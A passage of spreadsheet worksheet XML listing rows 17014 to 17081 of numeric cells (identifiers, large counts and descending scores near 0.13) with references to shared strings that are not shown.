      </c>
      <c r="F17014" s="2">
        <v>0.134920634920635</v>
      </c>
    </row>
    <row r="17015" ht="15.75" customHeight="1">
      <c r="A17015" s="1">
        <v>18739.0</v>
      </c>
      <c r="B17015" s="2">
        <v>5.3733759E7</v>
      </c>
      <c r="C17015" s="2" t="s">
        <v>16404</v>
      </c>
      <c r="D17015" s="2">
        <v>1.0</v>
      </c>
      <c r="E17015" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17015" s="2">
        <v>0.1347736625514403</v>
      </c>
    </row>
    <row r="17016" ht="15.75" customHeight="1">
      <c r="A17016" s="1">
        <v>21567.0</v>
      </c>
      <c r="B17016" s="2">
        <v>2.3764275E7</v>
      </c>
      <c r="C17016" s="2" t="s">
        <v>16405</v>
      </c>
      <c r="D17016" s="2">
        <v>1.0</v>
      </c>
      <c r="E17016" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17016" s="2">
        <v>0.1347736625514403</v>
      </c>
    </row>
    <row r="17017" ht="15.75" customHeight="1">
      <c r="A17017" s="1">
        <v>363.0</v>
      </c>
      <c r="B17017" s="2">
        <v>1.6177947E7</v>
      </c>
      <c r="C17017" s="2" t="s">
        <v>16406</v>
      </c>
      <c r="D17017" s="2">
        <v>1.0</v>
      </c>
      <c r="E17017" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17017" s="2">
        <v>0.1346516007532957</v>
      </c>
    </row>
    <row r="17018" ht="15.75" customHeight="1">
      <c r="A17018" s="1">
        <v>10386.0</v>
      </c>
      <c r="B17018" s="2">
        <v>8489153.0</v>
      </c>
      <c r="C17018" s="2" t="s">
        <v>16407</v>
      </c>
      <c r="D17018" s="2">
        <v>1.0</v>
      </c>
      <c r="E17018" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17018" s="2">
        <v>0.1346516007532957</v>
      </c>
    </row>
    <row r="17019" ht="15.75" customHeight="1">
      <c r="A17019" s="1">
        <v>14520.0</v>
      </c>
      <c r="B17019" s="2">
        <v>3.9782191E7</v>
      </c>
      <c r="C17019" s="2" t="s">
        <v>16408</v>
      </c>
      <c r="D17019" s="2">
        <v>1.0</v>
      </c>
      <c r="E17019" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17019" s="2">
        <v>0.1346516007532957</v>
      </c>
    </row>
    <row r="17020" ht="15.75" customHeight="1">
      <c r="A17020" s="1">
        <v>22564.0</v>
      </c>
      <c r="B17020" s="2">
        <v>3.8427091E7</v>
      </c>
      <c r="C17020" s="2" t="s">
        <v>16409</v>
      </c>
      <c r="D17020" s="2">
        <v>1.0</v>
      </c>
      <c r="E17020" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17020" s="2">
        <v>0.1343434343434343</v>
      </c>
    </row>
    <row r="17021" ht="15.75" customHeight="1">
      <c r="A17021" s="1">
        <v>34178.0</v>
      </c>
      <c r="B17021" s="2">
        <v>9939900.0</v>
      </c>
      <c r="C17021" s="2" t="s">
        <v>16410</v>
      </c>
      <c r="D17021" s="2">
        <v>1.0</v>
      </c>
      <c r="E17021" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17021" s="2">
        <v>0.1342592592592593</v>
      </c>
    </row>
    <row r="17022" ht="15.75" customHeight="1">
      <c r="A17022" s="1">
        <v>23679.0</v>
      </c>
      <c r="B17022" s="2">
        <v>6952342.0</v>
      </c>
      <c r="C17022" s="2" t="s">
        <v>16411</v>
      </c>
      <c r="D17022" s="2">
        <v>1.0</v>
      </c>
      <c r="E17022" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17022" s="2">
        <v>0.1339285714285715</v>
      </c>
    </row>
    <row r="17023" ht="15.75" customHeight="1">
      <c r="A17023" s="1">
        <v>32427.0</v>
      </c>
      <c r="B17023" s="2">
        <v>5649844.0</v>
      </c>
      <c r="C17023" s="2" t="s">
        <v>16412</v>
      </c>
      <c r="D17023" s="2">
        <v>1.0</v>
      </c>
      <c r="E17023" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17023" s="2">
        <v>0.1339285714285715</v>
      </c>
    </row>
    <row r="17024" ht="15.75" customHeight="1">
      <c r="A17024" s="1">
        <v>33007.0</v>
      </c>
      <c r="B17024" s="2">
        <v>6649178.0</v>
      </c>
      <c r="C17024" s="2" t="s">
        <v>16413</v>
      </c>
      <c r="D17024" s="2">
        <v>1.0</v>
      </c>
      <c r="E17024" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17024" s="2">
        <v>0.1339285714285715</v>
      </c>
    </row>
    <row r="17025" ht="15.75" customHeight="1">
      <c r="A17025" s="1">
        <v>3582.0</v>
      </c>
      <c r="B17025" s="2">
        <v>3.9016997E7</v>
      </c>
      <c r="C17025" s="2" t="s">
        <v>16414</v>
      </c>
      <c r="D17025" s="2">
        <v>1.0</v>
      </c>
      <c r="E17025" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17025" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="17026" ht="15.75" customHeight="1">
      <c r="A17026" s="1">
        <v>10448.0</v>
      </c>
      <c r="B17026" s="2">
        <v>1.0570704E7</v>
      </c>
      <c r="C17026" s="2" t="s">
        <v>16415</v>
      </c>
      <c r="D17026" s="2">
        <v>1.0</v>
      </c>
      <c r="E17026" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17026" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="17027" ht="15.75" customHeight="1">
      <c r="A17027" s="1">
        <v>12946.0</v>
      </c>
      <c r="B17027" s="2">
        <v>3.2375855E7</v>
      </c>
      <c r="C17027" s="2" t="s">
        <v>16416</v>
      </c>
      <c r="D17027" s="2">
        <v>1.0</v>
      </c>
      <c r="E17027" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17027" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="17028" ht="15.75" customHeight="1">
      <c r="A17028" s="1">
        <v>13041.0</v>
      </c>
      <c r="B17028" s="2">
        <v>3.3077997E7</v>
      </c>
      <c r="C17028" s="2" t="s">
        <v>16417</v>
      </c>
      <c r="D17028" s="2">
        <v>1.0</v>
      </c>
      <c r="E17028" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17028" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="17029" ht="15.75" customHeight="1">
      <c r="A17029" s="1">
        <v>15075.0</v>
      </c>
      <c r="B17029" s="2">
        <v>4.1728178E7</v>
      </c>
      <c r="C17029" s="2" t="s">
        <v>16418</v>
      </c>
      <c r="D17029" s="2">
        <v>1.0</v>
      </c>
      <c r="E17029" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17029" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="17030" ht="15.75" customHeight="1">
      <c r="A17030" s="1">
        <v>21630.0</v>
      </c>
      <c r="B17030" s="2">
        <v>2.4654165E7</v>
      </c>
      <c r="C17030" s="2" t="s">
        <v>16419</v>
      </c>
      <c r="D17030" s="2">
        <v>1.0</v>
      </c>
      <c r="E17030" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17030" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="17031" ht="15.75" customHeight="1">
      <c r="A17031" s="1">
        <v>21971.0</v>
      </c>
      <c r="B17031" s="2">
        <v>2.9155878E7</v>
      </c>
      <c r="C17031" s="2" t="s">
        <v>16420</v>
      </c>
      <c r="D17031" s="2">
        <v>1.0</v>
      </c>
      <c r="E17031" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17031" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="17032" ht="15.75" customHeight="1">
      <c r="A17032" s="1">
        <v>25344.0</v>
      </c>
      <c r="B17032" s="2">
        <v>1.3544415E7</v>
      </c>
      <c r="C17032" s="2" t="s">
        <v>16421</v>
      </c>
      <c r="D17032" s="2">
        <v>1.0</v>
      </c>
      <c r="E17032" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17032" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="17033" ht="15.75" customHeight="1">
      <c r="A17033" s="1">
        <v>26573.0</v>
      </c>
      <c r="B17033" s="2">
        <v>1.7883471E7</v>
      </c>
      <c r="C17033" s="2" t="s">
        <v>16422</v>
      </c>
      <c r="D17033" s="2">
        <v>1.0</v>
      </c>
      <c r="E17033" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17033" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="17034" ht="15.75" customHeight="1">
      <c r="A17034" s="1">
        <v>27241.0</v>
      </c>
      <c r="B17034" s="2">
        <v>2.1049992E7</v>
      </c>
      <c r="C17034" s="2" t="s">
        <v>16423</v>
      </c>
      <c r="D17034" s="2">
        <v>1.0</v>
      </c>
      <c r="E17034" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17034" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="17035" ht="15.75" customHeight="1">
      <c r="A17035" s="1">
        <v>28571.0</v>
      </c>
      <c r="B17035" s="2">
        <v>2.6933153E7</v>
      </c>
      <c r="C17035" s="2" t="s">
        <v>16424</v>
      </c>
      <c r="D17035" s="2">
        <v>1.0</v>
      </c>
      <c r="E17035" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17035" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="17036" ht="15.75" customHeight="1">
      <c r="A17036" s="1">
        <v>30318.0</v>
      </c>
      <c r="B17036" s="2">
        <v>3.8037294E7</v>
      </c>
      <c r="C17036" s="2" t="s">
        <v>16425</v>
      </c>
      <c r="D17036" s="2">
        <v>1.0</v>
      </c>
      <c r="E17036" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17036" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="17037" ht="15.75" customHeight="1">
      <c r="A17037" s="1">
        <v>31135.0</v>
      </c>
      <c r="B17037" s="2">
        <v>4889824.0</v>
      </c>
      <c r="C17037" s="2" t="s">
        <v>16426</v>
      </c>
      <c r="D17037" s="2">
        <v>1.0</v>
      </c>
      <c r="E17037" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17037" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="17038" ht="15.75" customHeight="1">
      <c r="A17038" s="1">
        <v>23707.0</v>
      </c>
      <c r="B17038" s="2">
        <v>7163001.0</v>
      </c>
      <c r="C17038" s="2" t="s">
        <v>16255</v>
      </c>
      <c r="D17038" s="2">
        <v>1.0</v>
      </c>
      <c r="E17038" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17038" s="2">
        <v>0.133879781420765</v>
      </c>
    </row>
    <row r="17039" ht="15.75" customHeight="1">
      <c r="A17039" s="1">
        <v>21988.0</v>
      </c>
      <c r="B17039" s="2">
        <v>2.9445753E7</v>
      </c>
      <c r="C17039" s="2" t="s">
        <v>16427</v>
      </c>
      <c r="D17039" s="2">
        <v>1.0</v>
      </c>
      <c r="E17039" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17039" s="2">
        <v>0.1335282651072125</v>
      </c>
    </row>
    <row r="17040" ht="15.75" customHeight="1">
      <c r="A17040" s="1">
        <v>33574.0</v>
      </c>
      <c r="B17040" s="2">
        <v>8262946.0</v>
      </c>
      <c r="C17040" s="2" t="s">
        <v>16428</v>
      </c>
      <c r="D17040" s="2">
        <v>1.0</v>
      </c>
      <c r="E17040" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17040" s="2">
        <v>0.1335125448028674</v>
      </c>
    </row>
    <row r="17041" ht="15.75" customHeight="1">
      <c r="A17041" s="1">
        <v>5348.0</v>
      </c>
      <c r="B17041" s="2">
        <v>4.5348473E7</v>
      </c>
      <c r="C17041" s="2" t="s">
        <v>16429</v>
      </c>
      <c r="D17041" s="2">
        <v>1.0</v>
      </c>
      <c r="E17041" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17041" s="2">
        <v>0.1334991708126037</v>
      </c>
    </row>
    <row r="17042" ht="15.75" customHeight="1">
      <c r="A17042" s="1">
        <v>23482.0</v>
      </c>
      <c r="B17042" s="2">
        <v>5731184.0</v>
      </c>
      <c r="C17042" s="2" t="s">
        <v>16274</v>
      </c>
      <c r="D17042" s="2">
        <v>1.0</v>
      </c>
      <c r="E17042" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17042" s="2">
        <v>0.1331417624521073</v>
      </c>
    </row>
    <row r="17043" ht="15.75" customHeight="1">
      <c r="A17043" s="1">
        <v>32503.0</v>
      </c>
      <c r="B17043" s="2">
        <v>5713783.0</v>
      </c>
      <c r="C17043" s="2" t="s">
        <v>16430</v>
      </c>
      <c r="D17043" s="2">
        <v>1.0</v>
      </c>
      <c r="E17043" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17043" s="2">
        <v>0.1331417624521073</v>
      </c>
    </row>
    <row r="17044" ht="15.75" customHeight="1">
      <c r="A17044" s="1">
        <v>1730.0</v>
      </c>
      <c r="B17044" s="2">
        <v>2.8748427E7</v>
      </c>
      <c r="C17044" s="2" t="s">
        <v>16431</v>
      </c>
      <c r="D17044" s="2">
        <v>1.0</v>
      </c>
      <c r="E17044" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17044" s="2">
        <v>0.1331236897274633</v>
      </c>
    </row>
    <row r="17045" ht="15.75" customHeight="1">
      <c r="A17045" s="1">
        <v>12447.0</v>
      </c>
      <c r="B17045" s="2">
        <v>2929631.0</v>
      </c>
      <c r="C17045" s="2" t="s">
        <v>16432</v>
      </c>
      <c r="D17045" s="2">
        <v>1.0</v>
      </c>
      <c r="E17045" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17045" s="2">
        <v>0.1331236897274633</v>
      </c>
    </row>
    <row r="17046" ht="15.75" customHeight="1">
      <c r="A17046" s="1">
        <v>15768.0</v>
      </c>
      <c r="B17046" s="2">
        <v>4.4181586E7</v>
      </c>
      <c r="C17046" s="2" t="s">
        <v>16433</v>
      </c>
      <c r="D17046" s="2">
        <v>1.0</v>
      </c>
      <c r="E17046" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17046" s="2">
        <v>0.1331236897274633</v>
      </c>
    </row>
    <row r="17047" ht="15.75" customHeight="1">
      <c r="A17047" s="1">
        <v>24463.0</v>
      </c>
      <c r="B17047" s="2">
        <v>1.0949517E7</v>
      </c>
      <c r="C17047" s="2" t="s">
        <v>16434</v>
      </c>
      <c r="D17047" s="2">
        <v>1.0</v>
      </c>
      <c r="E17047" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17047" s="2">
        <v>0.1328502415458938</v>
      </c>
    </row>
    <row r="17048" ht="15.75" customHeight="1">
      <c r="A17048" s="1">
        <v>26007.0</v>
      </c>
      <c r="B17048" s="2">
        <v>1.5335327E7</v>
      </c>
      <c r="C17048" s="2" t="s">
        <v>16435</v>
      </c>
      <c r="D17048" s="2">
        <v>1.0</v>
      </c>
      <c r="E17048" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17048" s="2">
        <v>0.1328502415458937</v>
      </c>
    </row>
    <row r="17049" ht="15.75" customHeight="1">
      <c r="A17049" s="1">
        <v>27314.0</v>
      </c>
      <c r="B17049" s="2">
        <v>2.1366991E7</v>
      </c>
      <c r="C17049" s="2" t="s">
        <v>16436</v>
      </c>
      <c r="D17049" s="2">
        <v>1.0</v>
      </c>
      <c r="E17049" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17049" s="2">
        <v>0.1328125000000001</v>
      </c>
    </row>
    <row r="17050" ht="15.75" customHeight="1">
      <c r="A17050" s="1">
        <v>11834.0</v>
      </c>
      <c r="B17050" s="2">
        <v>2.4688854E7</v>
      </c>
      <c r="C17050" s="2" t="s">
        <v>16437</v>
      </c>
      <c r="D17050" s="2">
        <v>1.0</v>
      </c>
      <c r="E17050" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17050" s="2">
        <v>0.1327683615819209</v>
      </c>
    </row>
    <row r="17051" ht="15.75" customHeight="1">
      <c r="A17051" s="1">
        <v>20394.0</v>
      </c>
      <c r="B17051" s="2">
        <v>1.2073773E7</v>
      </c>
      <c r="C17051" s="2" t="s">
        <v>16438</v>
      </c>
      <c r="D17051" s="2">
        <v>1.0</v>
      </c>
      <c r="E17051" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17051" s="2">
        <v>0.1327683615819209</v>
      </c>
    </row>
    <row r="17052" ht="15.75" customHeight="1">
      <c r="A17052" s="1">
        <v>24807.0</v>
      </c>
      <c r="B17052" s="2">
        <v>1.2038075E7</v>
      </c>
      <c r="C17052" s="2" t="s">
        <v>16439</v>
      </c>
      <c r="D17052" s="2">
        <v>1.0</v>
      </c>
      <c r="E17052" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17052" s="2">
        <v>0.1327683615819209</v>
      </c>
    </row>
    <row r="17053" ht="15.75" customHeight="1">
      <c r="A17053" s="1">
        <v>32941.0</v>
      </c>
      <c r="B17053" s="2">
        <v>6462103.0</v>
      </c>
      <c r="C17053" s="2" t="s">
        <v>16440</v>
      </c>
      <c r="D17053" s="2">
        <v>1.0</v>
      </c>
      <c r="E17053" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17053" s="2">
        <v>0.1327683615819209</v>
      </c>
    </row>
    <row r="17054" ht="15.75" customHeight="1">
      <c r="A17054" s="1">
        <v>1281.0</v>
      </c>
      <c r="B17054" s="2">
        <v>2.5534742E7</v>
      </c>
      <c r="C17054" s="2" t="s">
        <v>16441</v>
      </c>
      <c r="D17054" s="2">
        <v>1.0</v>
      </c>
      <c r="E17054" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17054" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="17055" ht="15.75" customHeight="1">
      <c r="A17055" s="1">
        <v>1634.0</v>
      </c>
      <c r="B17055" s="2">
        <v>2.7998059E7</v>
      </c>
      <c r="C17055" s="2" t="s">
        <v>16442</v>
      </c>
      <c r="D17055" s="2">
        <v>1.0</v>
      </c>
      <c r="E17055" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17055" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="17056" ht="15.75" customHeight="1">
      <c r="A17056" s="1">
        <v>6766.0</v>
      </c>
      <c r="B17056" s="2">
        <v>4.9419737E7</v>
      </c>
      <c r="C17056" s="2" t="s">
        <v>16443</v>
      </c>
      <c r="D17056" s="2">
        <v>1.0</v>
      </c>
      <c r="E17056" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17056" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="17057" ht="15.75" customHeight="1">
      <c r="A17057" s="1">
        <v>9352.0</v>
      </c>
      <c r="B17057" s="2">
        <v>5.5667336E7</v>
      </c>
      <c r="C17057" s="2" t="s">
        <v>16444</v>
      </c>
      <c r="D17057" s="2">
        <v>1.0</v>
      </c>
      <c r="E17057" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17057" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="17058" ht="15.75" customHeight="1">
      <c r="A17058" s="1">
        <v>10475.0</v>
      </c>
      <c r="B17058" s="2">
        <v>1.0871077E7</v>
      </c>
      <c r="C17058" s="2" t="s">
        <v>16445</v>
      </c>
      <c r="D17058" s="2">
        <v>1.0</v>
      </c>
      <c r="E17058" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17058" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="17059" ht="15.75" customHeight="1">
      <c r="A17059" s="1">
        <v>10553.0</v>
      </c>
      <c r="B17059" s="2">
        <v>1.2675333E7</v>
      </c>
      <c r="C17059" s="2" t="s">
        <v>16446</v>
      </c>
      <c r="D17059" s="2">
        <v>1.0</v>
      </c>
      <c r="E17059" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17059" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="17060" ht="15.75" customHeight="1">
      <c r="A17060" s="1">
        <v>10930.0</v>
      </c>
      <c r="B17060" s="2">
        <v>1.6920631E7</v>
      </c>
      <c r="C17060" s="2" t="s">
        <v>16447</v>
      </c>
      <c r="D17060" s="2">
        <v>1.0</v>
      </c>
      <c r="E17060" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17060" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="17061" ht="15.75" customHeight="1">
      <c r="A17061" s="1">
        <v>11511.0</v>
      </c>
      <c r="B17061" s="2">
        <v>2.221658E7</v>
      </c>
      <c r="C17061" s="2" t="s">
        <v>16448</v>
      </c>
      <c r="D17061" s="2">
        <v>1.0</v>
      </c>
      <c r="E17061" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17061" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="17062" ht="15.75" customHeight="1">
      <c r="A17062" s="1">
        <v>12080.0</v>
      </c>
      <c r="B17062" s="2">
        <v>2.668946E7</v>
      </c>
      <c r="C17062" s="2" t="s">
        <v>16449</v>
      </c>
      <c r="D17062" s="2">
        <v>1.0</v>
      </c>
      <c r="E17062" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17062" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="17063" ht="15.75" customHeight="1">
      <c r="A17063" s="1">
        <v>12458.0</v>
      </c>
      <c r="B17063" s="2">
        <v>2935081.0</v>
      </c>
      <c r="C17063" s="2" t="s">
        <v>16450</v>
      </c>
      <c r="D17063" s="2">
        <v>1.0</v>
      </c>
      <c r="E17063" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17063" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="17064" ht="15.75" customHeight="1">
      <c r="A17064" s="1">
        <v>13208.0</v>
      </c>
      <c r="B17064" s="2">
        <v>3.4140722E7</v>
      </c>
      <c r="C17064" s="2" t="s">
        <v>16451</v>
      </c>
      <c r="D17064" s="2">
        <v>1.0</v>
      </c>
      <c r="E17064" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17064" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="17065" ht="15.75" customHeight="1">
      <c r="A17065" s="1">
        <v>14379.0</v>
      </c>
      <c r="B17065" s="2">
        <v>3.9009218E7</v>
      </c>
      <c r="C17065" s="2" t="s">
        <v>16452</v>
      </c>
      <c r="D17065" s="2">
        <v>1.0</v>
      </c>
      <c r="E17065" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17065" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="17066" ht="15.75" customHeight="1">
      <c r="A17066" s="1">
        <v>14412.0</v>
      </c>
      <c r="B17066" s="2">
        <v>3.9221901E7</v>
      </c>
      <c r="C17066" s="2" t="s">
        <v>16453</v>
      </c>
      <c r="D17066" s="2">
        <v>1.0</v>
      </c>
      <c r="E17066" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17066" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="17067" ht="15.75" customHeight="1">
      <c r="A17067" s="1">
        <v>15865.0</v>
      </c>
      <c r="B17067" s="2">
        <v>4.4500741E7</v>
      </c>
      <c r="C17067" s="2" t="s">
        <v>16454</v>
      </c>
      <c r="D17067" s="2">
        <v>1.0</v>
      </c>
      <c r="E17067" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17067" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="17068" ht="15.75" customHeight="1">
      <c r="A17068" s="1">
        <v>19290.0</v>
      </c>
      <c r="B17068" s="2">
        <v>5.5180719E7</v>
      </c>
      <c r="C17068" s="2" t="s">
        <v>16455</v>
      </c>
      <c r="D17068" s="2">
        <v>1.0</v>
      </c>
      <c r="E17068" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17068" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="17069" ht="15.75" customHeight="1">
      <c r="A17069" s="1">
        <v>21233.0</v>
      </c>
      <c r="B17069" s="2">
        <v>1.9677697E7</v>
      </c>
      <c r="C17069" s="2" t="s">
        <v>16456</v>
      </c>
      <c r="D17069" s="2">
        <v>1.0</v>
      </c>
      <c r="E17069" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17069" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="17070" ht="15.75" customHeight="1">
      <c r="A17070" s="1">
        <v>21952.0</v>
      </c>
      <c r="B17070" s="2">
        <v>2.8910054E7</v>
      </c>
      <c r="C17070" s="2" t="s">
        <v>16457</v>
      </c>
      <c r="D17070" s="2">
        <v>1.0</v>
      </c>
      <c r="E17070" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17070" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="17071" ht="15.75" customHeight="1">
      <c r="A17071" s="1">
        <v>22106.0</v>
      </c>
      <c r="B17071" s="2">
        <v>3.0858432E7</v>
      </c>
      <c r="C17071" s="2" t="s">
        <v>16458</v>
      </c>
      <c r="D17071" s="2">
        <v>1.0</v>
      </c>
      <c r="E17071" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17071" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="17072" ht="15.75" customHeight="1">
      <c r="A17072" s="1">
        <v>22545.0</v>
      </c>
      <c r="B17072" s="2">
        <v>3.8095131E7</v>
      </c>
      <c r="C17072" s="2" t="s">
        <v>16459</v>
      </c>
      <c r="D17072" s="2">
        <v>1.0</v>
      </c>
      <c r="E17072" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17072" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="17073" ht="15.75" customHeight="1">
      <c r="A17073" s="1">
        <v>24727.0</v>
      </c>
      <c r="B17073" s="2">
        <v>1.1722508E7</v>
      </c>
      <c r="C17073" s="2" t="s">
        <v>16460</v>
      </c>
      <c r="D17073" s="2">
        <v>1.0</v>
      </c>
      <c r="E17073" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17073" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="17074" ht="15.75" customHeight="1">
      <c r="A17074" s="1">
        <v>25015.0</v>
      </c>
      <c r="B17074" s="2">
        <v>1.2780157E7</v>
      </c>
      <c r="C17074" s="2" t="s">
        <v>16461</v>
      </c>
      <c r="D17074" s="2">
        <v>1.0</v>
      </c>
      <c r="E17074" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17074" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="17075" ht="15.75" customHeight="1">
      <c r="A17075" s="1">
        <v>25099.0</v>
      </c>
      <c r="B17075" s="2">
        <v>1.294104E7</v>
      </c>
      <c r="C17075" s="2" t="s">
        <v>16462</v>
      </c>
      <c r="D17075" s="2">
        <v>1.0</v>
      </c>
      <c r="E17075" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17075" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="17076" ht="15.75" customHeight="1">
      <c r="A17076" s="1">
        <v>25855.0</v>
      </c>
      <c r="B17076" s="2">
        <v>1.4878802E7</v>
      </c>
      <c r="C17076" s="2" t="s">
        <v>16463</v>
      </c>
      <c r="D17076" s="2">
        <v>1.0</v>
      </c>
      <c r="E17076" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17076" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="17077" ht="15.75" customHeight="1">
      <c r="A17077" s="1">
        <v>26823.0</v>
      </c>
      <c r="B17077" s="2">
        <v>1.8846982E7</v>
      </c>
      <c r="C17077" s="2" t="s">
        <v>16464</v>
      </c>
      <c r="D17077" s="2">
        <v>1.0</v>
      </c>
      <c r="E17077" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17077" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="17078" ht="15.75" customHeight="1">
      <c r="A17078" s="1">
        <v>27609.0</v>
      </c>
      <c r="B17078" s="2">
        <v>2.2631531E7</v>
      </c>
      <c r="C17078" s="2" t="s">
        <v>16465</v>
      </c>
      <c r="D17078" s="2">
        <v>1.0</v>
      </c>
      <c r="E17078" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17078" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="17079" ht="15.75" customHeight="1">
      <c r="A17079" s="1">
        <v>28145.0</v>
      </c>
      <c r="B17079" s="2">
        <v>2.4810255E7</v>
      </c>
      <c r="C17079" s="2" t="s">
        <v>16466</v>
      </c>
      <c r="D17079" s="2">
        <v>1.0</v>
      </c>
      <c r="E17079" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17079" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="17080" ht="15.75" customHeight="1">
      <c r="A17080" s="1">
        <v>29246.0</v>
      </c>
      <c r="B17080" s="2">
        <v>3.0858431E7</v>
      </c>
      <c r="C17080" s="2" t="s">
        <v>16458</v>
      </c>
      <c r="D17080" s="2">
        <v>1.0</v>
      </c>
      <c r="E17080" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17080" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="17081" ht="15.75" customHeight="1">
      <c r="A17081" s="1">
        <v>30024.0</v>
      </c>
      <c r="B17081" s="2">
        <v>3.6178198E7</v>
      </c>
      <c r="C17081" s="2" t="s">
        <v>16467</v>
      </c>
      <c r="D17081" s="2">
        <v>1.0</v>
      </c>
      <c r="E17081" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17081" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
